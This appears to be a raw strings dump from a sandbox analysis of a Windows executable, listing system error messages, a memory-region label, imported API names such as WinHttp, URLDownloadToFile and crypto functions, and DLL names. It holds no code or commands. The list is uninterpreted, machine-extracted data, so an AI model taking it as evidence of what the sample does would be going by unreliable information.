Windows was unable to save all the data for the file %hs; the data has been lost.
Windows was unable to parse the requested XML data.
The RPC protocol sequence is not supported.
Not enough resources are available to complete this operation.
The RPC server is too busy to complete this operation.
The remote procedure call failed and did not execute.
The transfer syntax is not supported by the RPC server.
The type UUID is not supported.
The name syntax is not supported.
The operation cannot be performed.
No interfaces have been exported.
There is nothing to unexport.
The requested operation is not supported.
A floating point operation at the RPC server caused a divide by zero.
The requested authentication level is not supported.
The error specified is not a valid Windows RPC error code.
Invalid asynchronous RPC call handle for this operation.
Access to the HTTP proxy is denied.
HTTP proxy server rejected the connection because the cookie authentication failed.
A null context handle is passed as an [in] parameter.
The binding handles passed to a remote procedure call do not match.
A null reference pointer was passed to the stub.
Invalid operation on the encoding/decoding handle.
The RPC pipe object is invalid or corrupted.
An invalid operation was attempted on an RPC pipe object.
Unsupported RPC pipe version.
The RPC pipe object has already been closed.
The RPC call completed before all pipes were processed.
No more data is available from the RPC pipe.
Reissue the given operation as a cached IO operation
A close operation is pending on the Terminal Connection.
The MODEM.INF file was not found.
The modem (%1) was not found in MODEM.INF.
Transport driver error
An attempt has been made to connect to a session whose video mode is not supported by the current client.
DOS graphics mode is not supported.
The requested operation can be performed only on the system console.
Disconnecting the console session is not supported.
Reconnecting a disconnected session to the console is not supported.
The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported.
Windows can't connect to your session because a problem occurred in the Windows video subsystem. Try connecting again later, or contact the server administrator for assistance.
The resource loader failed to load MUI file because the file fail to pass validation.
The RC Manifest is corrupted with garbage data or unsupported version or missing required item.
A node is in the process of joining the cluster.
A cluster join operation is not in progress.
Windows was not able to process the application binding information.
The requested lookup key was not found in any active activation context.
Lack of system resources has required isolated activation to be disabled for the current thread of execution.
The activation context being deactivated is not active for the current thread of execution.
The activation context activation stack for the running thread of execution is corrupt.
A generic command executable returned a result that indicates failure.
The transaction handle associated with this operation is not valid.
The requested operation was made in the context of a transaction that is no longer active.
The Transaction Manager was unable to be successfully initialized. Transacted operations are not supported.
Transaction support within the specified resource manager is not started or was shut down due to an error.
The resource manager has attempted to prepare a transaction that it has not successfully joined.
The remote server or share does not support transacted file operations.
The Transaction object already has a superior enlistment, and the caller attempted an operation that would have created a new superior. Only a single superior enlistment is allowed.
The requested operation is not valid on the Transaction object in its current state.
It is too late to perform the requested operation, since the Transaction has already been aborted.
It is too late to perform the requested operation, since the Transaction has already been committed.
The buffer passed in to NtPushTransaction or NtPullTransaction is not in a valid format.
The operation cannot be performed because another transaction is depending on the fact that this property will not change.
The operation would involve a single file with two transactional resource managers and is therefore not allowed.
The $Txf directory must be empty for this operation to succeed.
The operation would leave a transactional resource manager in an inconsistent state and is therefore not allowed.
The operation could not be completed because the transaction manager does not have a log.
A rollback could not be scheduled because a previously scheduled rollback has already executed or been queued for execution.
The encryption operation could not be completed because a transaction is active.
Memory mapping (creating a mapped section) a remote file under a transaction is not supported.
This file is open for modification in an unresolved transaction and may be opened for execute only by a transacted reader.
The target volume is not a snapshot volume. This operation is only valid on a volume mounted as a snapshot.
The savepoint operation failed because files are open on the transaction. This is not permitted.
The sparse operation could not be completed because a transaction is active on the file.
The call to create a TransactionManager object failed because the Tm Identity stored in the logfile does not match the Tm Identity that was passed in as an argument.
The compression operation could not be completed because a transaction is active on the file.
The specified operation could not be performed on this Superior enlistment, because the enlistment was not created with the corresponding completion response in the NotificationMask.
The specified operation could not be performed, because the record that would be logged was too long. This can occur because of two conditions: either there are too many Enlistments on this Transaction, or the combined RecoveryInformation being logged on behalf of those Enlistments is too long.
The link tracking operation could not be completed because a transaction is active.
This operation cannot be performed in a transaction.
This snapshot operation cannot continue because a transactional resource manager cannot be frozen in its current state. Please try again.
The specified operation could not be performed because the resource manager is not enlisted in the transaction.
A policy on the log in question prevented the operation from completing.
Log is multiplexed, no direct writes to the physical log is allowed.
The operation failed because the log is a dedicated log.
The operation requires an archive context.
The operation requires a non-ephemeral log, but the log is ephemeral.
A handler was not defined by the filter for this operation.
Asynchronous requests are not valid for this operation.
Internal error code used by the filter manager to determine if a fastio operation should be forced down the IRP path. Mini-filters should never return this value.
Posting this operation to a worker thread for further processing is not safe at this time because it could lead to a system deadlock.
The filter must cleanup any operation specific context at this time because it is being removed from the system before the operation is completed by the lower drivers.
The Filter Manager had an internal error from which it cannot recover, therefore the operation has been failed. This is usually the result of a filter returning an invalid value from a pre-operation callback.
A duplicate handler definition has been provided for an operation.
Format of the obtained monitor descriptor is not supported by this release.
The driver needs more DMA buffer space in order to complete the requested operation.
Not enough video memory available to complete the operation.
The allocation can't be used from it's current segment location for the specified operation.
Specified VidPN topology is valid but is not supported by this model of the display adapter.
Specified VidPN topology is valid but is not supported by the display adapter at this time, due to current allocation of its resources.
Specified VidPN modality is not supported (e.g. at least two of the pinned modes are not cofunctional).
Miniport has no recommendation for augmentation of the specified VidPN's topology.
Miniport does not have any recommendation regarding the request to provide a functional VidPN given the current display adapter configuration.
System failed to determine a mode that is supported by both the display adapter and the monitor connected to it.
Specified VidPN present path importance ordinal is invalid.
Specified content geometry transformation is not supported on the respective VidPN present path.
Specified gamma ramp is not supported on the respective VidPN present path.
Multi-sampling is not supported on the respective VidPN present path.
All available importance ordinals are already used in specified topology.
Maximum supported number of present paths has been reached.
Miniport requested that augmentation be cancelled for the specified source of the specified VidPN's topology.
Specified display adapter child device does not support descriptor exposure.
An operation is being attempted that requires the display adapter to be in a quiescent state.
The driver does not support OPM.
The driver does not support COPP.
The driver does not support UAB.
The GDI display device passed to this function does not have any active protected outputs.
An internal error caused an operation to fail.
The function failed because the caller passed in an invalid OPM user mode handle.
A certificate could not be returned because the certificate buffer passed to the function was too small.
The HDCP System Renewability Message passed to this function did not comply with section 5 of the HDCP 1.1 specification.
The protected output cannot enable the High-bandwidth Digital Content Protection (HDCP) System because it does not support HDCP.
The protected output cannot enable Analogue Copy Protection (ACP) because it does not support ACP.
The protected output cannot enable the Content Generation Management System Analogue (CGMS-A) protection technology because it does not support CGMS-A.
The DxgkDdiOPMGetInformation function cannot return the version of the SRM being used because the application never successfully passed an SRM to the protected output.
The operating system asynchronously destroyed this OPM protected output because the operating system's state changed. This error typically occurs because the monitor PDO associated with this protected output was removed, the monitor PDO associated with this protected output was stopped, or the protected output's session became a non-console session.
The DxgkDdiOPMGetInformation and DxgkDdiOPMGetCOPPCompatibleInformation functions return this error code if the passed in sequence number is not the expected sequence number or the passed in OMAC value is invalid.
The DxgkDdiOPMGetCOPPCompatibleInformation and DxgkDdiOPMConfigureProtectedOutput functions return this error if the display driver does not support the DXGKMDT_OPM_GET_ACP_AND_CGMSA_SIGNALING and DXGKMDT_OPM_SET_ACP_AND_CGMSA_SIGNALING GUIDs.
The DxgkDdiOPMConfigureProtectedOutput function returns this error code if the passed in sequence number is not the expected sequence number or the passed in OMAC value is invalid.
The monitor does not support the specified VCP code.
The function failed because a monitor returned an invalid Timing Status byte when the operating system used the DDC/CI Get Timing Report & Timing Message command to get a timing report from a monitor.
A monitor returned a DDC/CI capabilities string which did not comply with the ACCESS.bus 3.0, DDC/CI 1.1, or MCCS 2 Revision 1 specification.
An operation failed because a DDC/CI message had an invalid value in its command field.
This function failed because an invalid monitor handle was passed to it.
The operating system asynchronously destroyed the monitor which corresponds to this handle because the operating system's state changed. This error typically occurs because the monitor PDO associated with this handle was removed, the monitor PDO associated with this handle was stopped, or a display mode change occurred. A display mode change occurs when windows sends a WM_DISPLAYCHANGE windows message to applications.
The function failed because the specified GDI display device was not attached to the Windows desktop.
This function does not support GDI mirroring display devices because GDI mirroring display devices do not have any physical monitors associated with them.
The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is NULL, it points to an invalid address, it points to a kernel mode address or it is not correctly aligned.
This function failed because the GDI device passed to it did not have any monitors associated with it.
An array passed to the function cannot hold all of the data that the function must copy into the array.
The volume is not encrypted, no key is available.
The volume cannot be encrypted because the file system is not supported.
This operation cannot be performed while a file system is mounted on the volume.
BitLocker Drive Encryption is not included with this version of Windows.
A read operation failed while converting the volume.
A write operation failed while converting the volume.
The encryption algorithm does not support the sector size of that volume.
The BitLocker startup key or recovery password could not be read from external media.
The BitLocker startup key or recovery password file is corrupt or invalid.
The BitLocker encryption key could not be obtained from the startup key or recovery password.
The authorization data for the Storage Root Key (SRK) of the Trusted Platform Module (TPM) is not zero.
The system boot information changed or the Trusted Platform Module (TPM) locked out access to BitLocker encryption keys until the computer is restarted.
The BitLocker encryption key could not be obtained from the Trusted Platform Module (TPM).
The BitLocker encryption key could not be obtained from the Trusted Platform Module (TPM) and PIN.
The Boot Configuration Data (BCD) settings are not supported or have changed since BitLocker was enabled.
The BitLocker encryption key could not be obtained.
The auto-unlock master key was not available from the operating system volume. Retry the operation using the BitLocker WMI interface.
This feature of BitLocker Drive Encryption is not included with this version of Windows.
The management information stored on the drive contained an unknown type. If you are using an old version of Windows, try accessing the drive from the latest version.
The BitLocker encryption key could not be obtained from the Trusted Platform Module (TPM) and enhanced PIN. Try using a PIN containing only numerals.
The operation is not supported by the specified layer.
The displayData.name field cannot be null.
A filter condition contains a match type that is not compatible with the operands.
A filter cannot contain multiple conditions operating on a single field.
A policy cannot contain the same keying module more than once.
The TCP/IP stack is not ready.
Network interface is not ready to complete this operation.
The length of the buffer submitted for this operation is not valid.
The data used for this operation is not valid.
The length of buffer submitted for this operation is too small.
Network interface does not support this OID (Object Identifier)
Network interface does not support this media type.
The I/O operation failed because network media is disconnected or wireless access point is out of range.
The offload operation on the network interface has been paused.
The revision number specified in the structure is not supported.
The specified port does not exist on this network interface.
The current state of the specified port on this network interface does not support the requested operation.
The miniport adapter is in lower power state.
Netword interface does not support this request.
The TCP connection is not offloadable because of a local policy setting.
The TCP connection is not offloadable by the Chimney offload target.
The wireless local area network interface is in auto configuration mode and doesn't support the requested parameter change operation.
The wireless local area network interface is busy and can not perform the requested operation.
The wireless local area network interface is power down and doesn't support the requested operation.
The hypervisor does not support the operation because the specified hypercall code is not supported.
The hypervisor does not support the operation because the encoding for the hypercall input register is not supported.
The hypervisor could not perform the operation beacuse a parameter has an invalid alignment.
The hypervisor could not perform the operation beacuse an invalid parameter was specified.
The hypervisor could not perform the operation because the partition is entering or in an invalid state.
The operation is not allowed in the current state.
There is not enough memory in the hypervisor pool to complete the operation.
The hypervisor could not perform the operation because the specified VP index is invalid.
The hypervisor could not perform the operation because the specified port identifier is invalid.
The hypervisor could not perform the operation because the specified connection identifier is invalid.
The hypervisor could not complete the operation because a required feature of the synthetic interrupt controller (SynIC) was disabled.
The hypervisor could not perform the operation because the object or value was either already in use or being used for a purpose that would not permit completing the operation.
The physical connection being used for debuggging has not recorded any receive activity since the last operation.
There are not enough resources to complete the operation.
IPsec DoS Protection received an IPsec negotiation packet for a keying module which is not allowed by policy.
Cannot unlock the page array for the guest operating system memory address because it does not match a previous lock request. Restarting the virtual machine may fix the problem. If the problem persists, try restarting the physical computer.
The non-uniform memory access (NUMA) node settings do not match the system NUMA topology. In order to start the virtual machine, you will need to modify the NUMA configuration. For detailed information, see hXXp://go.microsoft.com/fwlink/?LinkId=92362.
The lock or unlock request uses an invalid guest operating system memory address. Restarting the virtual machine may fix the problem. If the problem persists, try restarting the physical computer.
The specified disk is an invalid disk. Operation cannot complete on an invalid disk.
The disk layout contains more than the maximum number of supported partitions.
The specified disk is missing. The operation cannot complete on a missing disk.
There is not enough usable space for this operation.
Dynamic disks are not supported on this system.
The system does not support fault tolerant volumes.
The specified number of plexes is invalid.
The specified pack is the invalid pack. The operation cannot complete with the invalid pack.
The specified disk has an unsupported partition style. Only MBR and GPT partition styles are supported.
The specified plex is already in-sync with the other active plexes. It does not need to be regenerated.
The specified plex index is greater or equal than the number of plexes in the volume.
The operation is only supported on RAID-5 plexes.
The operation is only supported on simple plexes.
The operation is only supported on mirrored volumes.
The operation is not supported on mirrored volumes.
The operation is only supported on simple and spanned plexes.
The system does not support mirrored volumes.
The system does not support RAID-5 volumes.
The version does not support this version of the file format.
The system does not support this version of the virtual hard disk.This version of the sparse header is not supported.
The system does not support this version of the virtual hard disk. The block size is invalid.
A virtual disk support provider for the specified file was not found.
The requested operation could not be completed due to a virtual disk system limitation. Virtual disks are only supported on NTFS volumes and must be both uncompressed and unencrypted.
The requested operation cannot be performed on a virtual disk of this type.
The requested operation cannot be performed on the virtual disk in its current state.
The sector size of the physical disk on which the virtual disk resides is not supported.
The Derived Indexed Store is not present (or currently loaded) on this system.

%original file name%.exe_2060_rwx_027F0000_000D5000:

CM_Open_DevNode_Key
CryptCATCatalogInfoFromContext
WSDCreateUdpTransport
WSDCreateUdpMessageParameters
WSDCreateUdpAddress
WSDCreateHttpTransport
WSDCreateHttpMessageParameters
WSDCreateHttpAddress
WSASendMsg
WlanGetProfileKeyInfo
WlanHostedNetworkSetSecondaryKey
WlanHostedNetworkQuerySecondaryKey
_WinStationNotifyDisconnectPipe
WinStationUserLoginAccessCheck
WinStationSetAutologonPassword
WinStationReportUIResult
WinStationIsHelpAssistantSession
WinStationGetUserCertificates
WinStationFreeUserCertificates
WinStationEnumerate_IndexedW
WinStationEnumerate_IndexedA
midiOutShortMsg
u_GetFileExtensionFromUrl
UrlZonesDetach
UpdateUrlCacheContentPath
UnlockUrlCacheEntryStream
UnlockUrlCacheEntryFileW
UnlockUrlCacheEntryFileA
ShowX509EncodedCertificate
ShowClientAuthCerts
ShowCertificate
SetUrlCacheHeaderData
SetUrlCacheGroupAttributeW
SetUrlCacheGroupAttributeA
SetUrlCacheEntryInfoW
SetUrlCacheEntryInfoA
SetUrlCacheEntryGroupW
SetUrlCacheEntryGroupA
SetUrlCacheConfigInfoW
SetUrlCacheConfigInfoA
RunOnceUrlCache
RetrieveUrlCacheEntryStreamW
RetrieveUrlCacheEntryStreamA
RetrieveUrlCacheEntryFileW
RetrieveUrlCacheEntryFileA
RegisterUrlCacheNotification
ReadUrlCacheEntryStream
ParseX509EncodedCertificateForListBoxEntry
LoadUrlCacheContent
IsUrlCacheEntryExpiredW
IsUrlCacheEntryExpiredA
IsHostInProxyBypassList
InternetShowSecurityInfoByURLW
InternetShowSecurityInfoByURLA
InternetOpenUrlW
InternetOpenUrlA
InternetGetSecurityInfoByURLW
InternetGetSecurityInfoByURLA
InternetGetCertByURLA
InternetGetCertByURL
InternetCreateUrlW
InternetCreateUrlA
InternetCrackUrlW
InternetCrackUrlA
InternetCombineUrlW
InternetCombineUrlA
InternetCanonicalizeUrlW
InternetCanonicalizeUrlA
IncrementUrlCacheHeaderData
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoW
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpEndRequestW
HttpEndRequestA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
GetUrlCacheHeaderData
GetUrlCacheGroupAttributeW
GetUrlCacheGroupAttributeA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoExW
GetUrlCacheEntryInfoExA
GetUrlCacheEntryInfoA
GetUrlCacheConfigInfoW
GetUrlCacheConfigInfoA
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryA
FtpRenameFileW
FtpRenameFileA
FtpRemoveDirectoryW
FtpRemoveDirectoryA
FtpPutFileW
FtpPutFileEx
FtpPutFileA
FtpOpenFileW
FtpOpenFileA
FtpGetFileW
FtpGetFileSize
FtpGetFileEx
FtpGetFileA
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryA
FtpFindFirstFileW
FtpFindFirstFileA
FtpDeleteFileW
FtpDeleteFileA
FtpCreateDirectoryW
FtpCreateDirectoryA
FtpCommandW
FtpCommandA
FreeUrlCacheSpaceW
FreeUrlCacheSpaceA
FindNextUrlCacheGroup
FindNextUrlCacheEntryW
FindNextUrlCacheEntryExW
FindNextUrlCacheEntryExA
FindNextUrlCacheEntryA
FindNextUrlCacheContainerW
FindNextUrlCacheContainerA
FindFirstUrlCacheGroup
FindFirstUrlCacheEntryW
FindFirstUrlCacheEntryExW
FindFirstUrlCacheEntryExA
FindFirstUrlCacheEntryA
FindFirstUrlCacheContainerW
FindFirstUrlCacheContainerA
FindCloseUrlCache
DetectAutoProxyUrl
DeleteUrlCacheGroup
DeleteUrlCacheEntryW
DeleteUrlCacheEntryA
DeleteUrlCacheContainerW
DeleteUrlCacheContainerA
CreateUrlCacheGroup
CreateUrlCacheEntryW
CreateUrlCacheEntryA
CreateUrlCacheContainerW
CreateUrlCacheContainerA
CommitUrlCacheEntryW
CommitUrlCacheEntryA
uWinHttpWriteData
WinHttpTimeToSystemTime
WinHttpTimeFromSystemTime
WinHttpSetTimeouts
WinHttpSetStatusCallback
WinHttpSetOption
WinHttpSetCredentials
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpQueryOption
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryAuthSchemes
WinHttpOpenRequest
WinHttpOpen
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetDefaultProxyConfiguration
WinHttpCreateUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpCloseHandle
WinHttpAddRequestHeaders
uWerpSubmitReportFromStore
WerpSetReportFlags
WerpSetIntegratorReportId
WerpGetReportFlags
WerpGetIntegratorReportId
WerpCreateIntegratorReportId
WerpAddRegisteredDataToReport
WerReportSubmit
WerReportSetUIOption
WerReportSetParameter
WerReportCreate
WerReportCloseHandle
WerReportAddFile
WerReportAddDump
WsShutdownSessionChannel
WsRegisterOperationForCancel
WsGetOperationContextProperty
WsEncodeUrl
WsDecodeUrl
WsCombineUrl
WsAsyncExecute
ToplScheduleImport
ToplScheduleExportReadonly
LogonUserExExW
ChangeAccountPasswordW
ChangeAccountPasswordA
NetServerTransportEnum
NetServerTransportDel
NetServerTransportAddEx
SqmIsWindowsOptedIn
SLSetCurrentProductKey
SLGetPKeyInformation
SLGetPKeyId
SLGetInstalledProductKeyIds
SpInfGetLineTextWithKey
SLGetPackageProductKey
uGetScheduledDiagnosticsExecutionLevel
SceSetupUpdateSecurityKey
uSamiSyncDSRMPasswordFromAccount
SamiOemChangePasswordUser2WithTransport
SamiChangePasswordUser3
SamiChangePasswordUser
SamiChangeKeys
SamValidatePassword
SamChangePasswordUser2
SamChangePasswordUser
uNetValidatePasswordPolicyFree
NetValidatePasswordPolicy
NetUserChangePassword
RmJoinSession
uWinHttpCallbackAvrf
I_RpcBindingInqTransportType
PowerOpenUserPowerKey
PowerOpenSystemPowerKey
PowerInternalImportPowerScheme
uCertAutoRemove
CertAutoEnrollment
PeerGraphImportDatabase
PeerGraphExportDatabase
uOneXUpdatePortProfile
OneXDestroySupplicantPort
OneXCreateSupplicantPort
KccExecuteTask
uUpdateBackupExclusionKey
NetpIsShareNameValid
NetRemoteComputerSupports
NetpGetJoinInformation
NetpDomainJoinLicensingCheck
NetpDoDomainJoin
NetpCompleteOfflineDomainJoin
NetRequestOfflineDomainJoin
NdfExecuteDiagnosis
NdfCreateWebIncidentEx
NdfCreateWebIncident
BCryptImportKeyPair
BCryptImportKey
BCryptGenerateSymmetricKey
BCryptGenerateKeyPair
BCryptFinalizeKeyPair
BCryptExportKey
BCryptDuplicateKey
BCryptDestroyKey
BCryptDeriveKeyPBKDF2
BCryptDeriveKeyCapi
BCryptDeriveKey
uWasDTCInstalledBySQL
uSpcGetCertFromKey
GetCryptProvFromCertEx
GetCryptProvFromCert
FreeCryptProvFromCertEx
FreeCryptProvFromCert
uShowModelessHTMLDialog
MprConfigTransportSetInfo
MprConfigTransportGetInfo
MprConfigTransportGetHandle
MprConfigTransportDelete
MprConfigTransportCreate
MprConfigInterfaceTransportRemove
MprConfigInterfaceTransportGetInfo
MprConfigInterfaceTransportGetHandle
MprConfigInterfaceTransportEnum
MprConfigInterfaceTransportAdd
MprAdminTransportSetInfo
MprAdminTransportGetInfo
MprAdminTransportCreate
MprAdminPortGetInfo
MprAdminPortEnum
MprAdminInterfaceTransportRemove
MprAdminInterfaceTransportAdd
WNetPasswordChangeNotify
uMFCreateSourceReaderFromURL
MFCreateSinkWriterFromURL
MFGetSupportedSchemes
MFGetSupportedMimeTypes
MFCreateASFMultiplexer
MFCreateASFIndexerByteStream
MFCreateASFIndexer
LsaINotifyPasswordChanged
LsaICallPackagePassthrough
PRShowSaveFromMsginaW
PRShowRestoreFromMsginaW
KRShowKeyMgr
MimeOleParseMhtmlUrl
ImmGetVirtualKey
ImageRemoveCertificate
ImageGetCertificateHeader
ImageGetCertificateData
ImageEnumerateCertificates
ImageAddCertificate
FindExecutableImage
AddUrlToFavorites
uTestURL
ShowInetcpl
NewUrl
ImportZones
ImportSearchProviders
ImportRatings
ImportRSSFeeds
ImportQuickLinks
ImportPrograms
ImportHomePage
ImportFavoritesCmd
ImportFavorites
ImportConnectSet
ImportADMFile
GetURLLinkType
GetFavoriteUrl
ExportRSSFeeds
ExportQuickLinks
ExportFavorites
CheckForDupKeys
uIcfGetOperationalMode
GdiplusShutdown
GdipSetImageAttributesColorKeys
SetViewportOrgEx
SetViewportExtEx
FaxSetPortW
FaxSetPortExW
FaxSetPortExA
FaxSetPortA
FaxOpenPort
FaxGetReportedServerAPIVersion
FaxGetPortW
FaxGetPortExW
FaxGetPortExA
FaxGetPortA
FaxEnumPortsW
FaxEnumPortsExW
FaxEnumPortsExA
FaxEnumPortsA
FwpmFilterGetByKey0
FwpmFilterDeleteByKey0
FmsGetGdiLogicalFont
FmsGetGDILogFont
FmsGetFontProperty
FmsGetFontAutoActivationMode
FmsGetFilteredPropertyList
FmsGetFilteredFontList
FmsGetDirectWriteLogFont
FmsGetCurrentFilter
FmsGetBestMatchInFamily
FWResetIndicatedPortInUse
FWIndicatePortInUse
JetMakeKey
DwmGetTransportAttributes
upServerImportDriverPackage
DriverStoreImportW
uDrtDeleteIpv6UdpTransport
DrtCreateIpv6UdpTransport
DrtDeleteDerivedKeySecurityProvider
DrtCreateDerivedKeySecurityProvider
DrtCreateDerivedKey
uDrtUpdateKey
DrtUnregisterKey
DrtRegisterKey
NetDfsGetSupportedNamespaceVersion
DevObjOpenDeviceInterfaceRegKey
DevObjOpenDevRegKey
DevObjOpenClassRegKey
DevObjGetDevicePropertyKeys
DevObjGetDeviceInterfacePropertyKeys
DevObjGetClassPropertyKeys
DevObjDeleteDeviceInterfaceRegKey
DevObjDeleteDevRegKey
DevObjCreateDeviceInterfaceRegKey
DevObjCreateDevRegKey
uDavGetUNCFromHTTPPath
DavGetHTTPFromUNCPath
DavCheckAndConvertHttpUrlToUncName
CryptXmlImportPublicKey
CryptUIWizCertRequest
CryptUIDlgViewCertificateW
CryptUIDlgSelectCertificateW
CryptUIDlgSelectCertificateFromStore
CryptUIDlgCertMgr
CertSelectionGetSerializedBlob
CryptSetKeyParam
CryptImportKey
CryptGetUserKey
CryptGetKeyParam
CryptGenKey
CryptExportKey
CryptDestroyKey
CryptDeriveKey
uCryptRetrieveObjectByUrlW
CryptRetrieveObjectByUrlA
uGetFriendlyNameOfCertW
GetFriendlyNameOfCertA
CertViewPropertiesW
CertViewPropertiesA
CertSelectCertificateW
CertSelectCertificateA
CredUIPromptForWindowsCredentialsWorker
CredUIPromptForWindowsCredentialsW
CredUICmdLinePromptForCredentialsW
uTaskDialogIndirect
PstMapCertificate
PstGetUserNameForCertificate
PstGetCertificates
PstAcquirePrivateKey
uCAGetCertTypePropertyEx
CAGetCertTypeProperty
CAGetCertTypeKeySpec
CAGetCertTypeFlagsEx
CAGetCertTypeFlags
CAGetCertTypeExtensionsEx
CAGetCertTypeExtensions
CAGetCertTypeExpiration
CAGetCACertificate
CAFreeCertTypeProperty
CAFreeCertTypeExtensions
CAFindCertTypeByName
CAEnumNextCertType
CAEnumCertTypesForCAEx
CAEnumCertTypesForCA
CAEnumCertTypes
CACountCertTypes
CACloseCertType
CACertTypeAccessCheckEx
CACertTypeAccessCheck
GetAppImport
PeerIdentityImport
PeerIdentityGetCryptKey
PeerIdentityExport
PeerGroupResumePasswordAuthentication
PeerGroupPasswordJoin
PeerGroupJoin
PeerGroupImportDatabase
PeerGroupImportConfig
PeerGroupExportDatabase
PeerGroupExportConfig
PeerGroupCreatePasswordInvitation
PeerCollabExportContact
GetUdpStatisticsEx
GetUdpStatistics
GetTcpStatisticsEx
GetTcpStatistics
DsaopExecuteScript
DsMakePasswordCredentialsW
DsMakePasswordCredentialsA
DsFreePasswordCredentials
EfsUtilGetCurrentKey
PSStringFromPropertyKey
PSPropertyKeyFromString
PSPropertyBag_WritePropertyKey
PSPropertyBag_ReadPropertyKey
PSGetPropertyKeyFromName
PSGetNameFromPropertyKey
__AddMachineCertToLicenseStore
RasIsSharedConnection
MprmsgGetErrorString
SslOpenPrivateKey
SslImportMasterKey
SslImportKey
SslGetKeyProperty
SslGenerateSessionKeys
SslGenerateMasterKey
SslExportKey
SslCreateEphemeralKey
SslComputeEapKeyBlock
NCryptOpenKey
NCryptNotifyChangeKey
NCryptIsKeyHandle
NCryptIsAlgSupported
NCryptImportKey
NCryptFinalizeKey
NCryptExportKey
NCryptEnumKeys
NCryptDeriveKey
NCryptDeleteKey
NCryptCreatePersistedKey
uHttpWaitForDisconnectEx
HttpWaitForDisconnect
HttpWaitForDemandStart
HttpTerminate
HttpShutdownRequestQueue
HttpSetUrlGroupProperty
HttpSetServiceConfiguration
HttpSetServerSessionProperty
HttpSetRequestQueueProperty
HttpSendResponseEntityBody
HttpSendHttpResponse
HttpRemoveUrlFromUrlGroup
HttpRemoveUrl
HttpReceiveRequestEntityBody
HttpReceiveHttpRequest
HttpReceiveClientCertificate
HttpReadFragmentFromCache
HttpQueryUrlGroupProperty
HttpQueryServiceConfiguration
HttpQueryServerSessionProperty
HttpQueryRequestQueueProperty
HttpInitialize
HttpGetCounters
HttpFlushResponseCache
HttpDeleteServiceConfiguration
HttpCreateUrlGroup
HttpCreateServerSession
HttpCreateRequestQueue
HttpCreateHttpHandle
HttpCloseUrlGroup
HttpCloseServerSession
HttpCloseRequestQueue
HttpCancelHttpRequest
HttpAddUrlToUrlGroup
HttpAddUrl
HttpAddFragmentToCache
uUrlMkSetSessionOption
UrlMkGetSessionOption
URLOpenBlockingStreamW
URLOpenBlockingStreamA
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToCacheFileW
URLDownloadToCacheFileA
ResetUrlmonLanguageData
IsValidURL
GetUrlmonThreadNotificationHwnd
GetPortFromUrlScheme
GetMarkOfTheWeb
GetAddSitesFileUrl
CreateURLMonikerEx2
CreateURLMonikerEx
CreateURLMoniker
CoInternetParseUrl
CoInternetIsFeatureEnabledForUrl
CoInternetGetSecurityUrlEx
CoInternetGetSecurityUrl
CoInternetCompareUrl
CoInternetCombineUrlEx
CoInternetCombineUrl
CoGetClassObjectFromURL
acmDriverRemove
acmDriverOpen
acmDriverClose
acmDriverAddW
uxpsrasterservice.dll
xolehlp.dll
xmllite.dll
wtsapi32.dll
wsdapi.dll
ws2_32.dll
wmvcore.dll
wmpmde.dll
wmi.dll
wmdrmsdk.dll
wldap32.dll
wlanutil.dll
wlanhlp.dll
wlanapi.dll
wkscli.dll
wintrust.dll
winsta.dll
winspool.drv
winscard.dll
winnsi.dll
winmm.dll
wininet.dll
winhttp.dll
windowscodecs.dll
winbrand.dll
werui.dll
wer.dll
webservices.dll
webio.dll
wdi.dll
w32topl.dll
vssapi.dll
vpnikeapi.dll
virtdisk.dll
version.dll
vaultcli.dll
uxtheme.dll
uxinit.dll
utildll.dll
usp10.dll
userenv.dll
user32.dll
urlmon.dll
uiautomationcore.dll
ubpm.dll
tdh.dll
tapi32.dll
syssetup.dll
synceng.dll
sti.dll
sspicli.dll
srvcli.dll
srclient.dll
sqmapi.dll
sppc.dll
spinf.dll
spfileq.dll
sndvolsso.dll
slcext.dll
slc.dll
shlwapi.dll
shfolder.dll
shell32.dll
shdocvw.dll
sfmapi.dll
sfc.dll
setupapi.dll
sensapi.dll
secur32.dll
sdiagschd.dll
scecli.dll
scarddlg.dll
samsrv.dll
samlib.dll
samcli.dll
rtutils.dll
rstrtmgr.dll
rpcshim.dll
rpcrt4.dll
rpchttp.dll
regapi.dll
rasman.dll
rasdlg.dll
rasapi32.dll
qwave.dll
query.dll
pstorec.dll
psapi.dll
propsys.dll
profapi.dll
printui.dll
powrprof.dll
pidgenx.dll
pidgen.dll
pcwum.dll
pautoenr.dll
p2pgraph.dll
p2p.dll
opengl32.dll
onexui.dll
onex.dll
oledlg.dll
oleaut32.dll
oleacc.dll
ole32.dll
odbc32.dll
occache.dll
ntshrui.dll
ntmarta.dll
ntlanman.dll
ntdskcc.dll
ntdsetup.dll
ntdsbsrv.dll
ntdsapi.dll
ntdsa.dll
nsi.dll
normaliz.dll
netutils.dll
netshell.dll
netplwiz.dll
netman.dll
netlogon.dll
netjoin.dll
netcfgx.dll
netbios.dll
netapi32.dll
ndfapi.dll
ncrypt.dll
nci.dll
mtxclu.dll
mswsock.dll
mssign32.dll
msrating.dll
msoobeui.dll
msjava.dll
msimg32.dll
msiltcfg.dll
msi.dll
mshtml.dll
msgina.dll
msfeeds.dll
msdrm.dll
msctf.dll
mscat32.dll
msacm32.dll
mqrt.dll
mprmsg.dll
mprapi.dll
mpr.dll
mmdevapi.dll
mlang.dll
mfreadwrite.dll
mfplat.dll
mf.dll
mdedrmstublib.dll
lsasrv.dll
logoncli.dll
loadperf.dll
linkinfo.dll
ktmw32.dll
keymgr.dll
kdcsvc.dll
iphlpapi.dll
inseng.dll
inetcomm.dll
imm32.dll
imgutil.dll
imagehlp.dll
ieui.dll
ieshims.dll
ieframe.dll
ieakeng.dll
iashlpr.dll
httpapi.dll
hnetcfg.dll
hlink.dll
hid.dll
gpsvc.dll
gpapi.dll
gdiplus.dll
gdi32.dll
